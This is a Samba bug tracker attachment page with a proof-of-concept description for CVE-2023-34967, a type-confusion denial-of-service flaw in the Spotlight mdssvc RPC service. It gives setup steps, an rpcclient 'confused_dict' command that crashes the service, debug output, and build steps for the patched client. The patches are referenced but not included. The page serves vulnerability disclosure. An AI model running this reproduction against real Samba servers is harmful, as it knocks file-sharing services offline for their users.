The Samba-Bugzilla – Attachment 17841 Details for
Bug 15341
[SECURITY] CVE-2023-34967: Samba Spotlight mdssvc RPC Request Type Confusion Denial-of-Service Vulnerability
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
PoC Description
poc.txt (text/plain), 2.71 KB, created by
Ralph Böhme
on 2023-03-23 09:40:26 UTC
(
hide
)
Description:
PoC Description
Filename:
MIME Type:
Creator:
Ralph Böhme
Created:
2023-03-23 09:40:26 UTC
Size:
2.71 KB
patch
obsolete
>## Proof-Of-Concept > >We extended the `rpcclient` CLI tool from the samba project own source code with the `confused_dict` command to allow us to send a dictionary that would leak to a Type Confusion. > >### Configuration > >1. Create the directory for the share: `mkdir ~/sambashare` >2. Setup a new samba share in `/etc/samba/smb.conf`: > >```ini ># [...] > >[sambashare] > comment = Samba on KUDU > path = /home/user/sambashare > read only = no > browsable = yes > guest ok = yes > >``` > > 3. We also suppose that an user named `user` with the password `user` was created beforehand and that this user is allowed to access the share `sambashare`. > >### Usage > > >```bash >bin/rpcclient -U 'user' --password=user 'ncacn_np:localhost[\pipe\mdssvc]' -c "confused_dict sambashare /tmp" >Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it >[DEBUG] Got an handle! >[DEBUG] command name added! >[DEBUG] sl_dict_t created! >[DEBUG] Dictionary built! >DALLOC_CTX(#1): { > sl_array_t(#2): { > sl_array_t(#3): { > string: openQueryWithParams:forContext: > uint64_t: 0xdeadbeef > uint64_t: 0xcafebabe > } > sl_dict_t(#4): { > string: kMDQueryString > string: * > string: kMDScopeArray > string: AAAABBBB > } > } >} > >dcerpc_mdssvc_cmd failed: NT_STATUS_CONNECTION_DISCONNECTED >result was NT_STATUS_CONNECTION_DISCONNECTED >``` > >### Patch > >A serie of two patches was applied against the master branch, commit: 01cdc5e00be78a51f0766634cc7fe50de2088203. > >```bash >> git clone https://gitlab.com/samba-team/samba.git >> cd samba >> git apply 0001-add-the-raw_blob-command-for-the-Spotlight-RPC-in-rp.patch >> git apply 0002-add-confused_dict-command-to-rpcclient-to-trigger-th.patch >``` > >The patches are attached to this report. > >## Build instruction > >On [Ubuntu 22.10](https://wiki.samba.org/index.php/Package_Dependencies_Required_to_Build_Samba#Debian_/_Ubuntu) > >```bash >> apt-get install acl attr autoconf bind9utils bison build-essential \ > debhelper dnsutils docbook-xml docbook-xsl flex gdb libjansson-dev krb5-user \ > libacl1-dev libaio-dev libarchive-dev libattr1-dev libblkid-dev libbsd-dev \ > libcap-dev libcups2-dev libgnutls28-dev libgpgme-dev libjson-perl \ > libldap2-dev libncurses5-dev libpam0g-dev libparse-yapp-perl \ > libpopt-dev libreadline-dev nettle-dev perl perl-modules pkg-config \ > python-all-dev python-crypto python-dbg python-dev python-dnspython \ > python3-dnspython python-gpgme python3-gpgme python-markdown python3-markdown \ > python3-dev xsltproc zlib1g-dev liblmdb-dev lmdb-utils >> ./configure --enable-debug >> make -j >```
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=17841">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 15341
: 17841 |
17903
|
17911
|
17917
|
17920
|
17943
|
17944
|
17951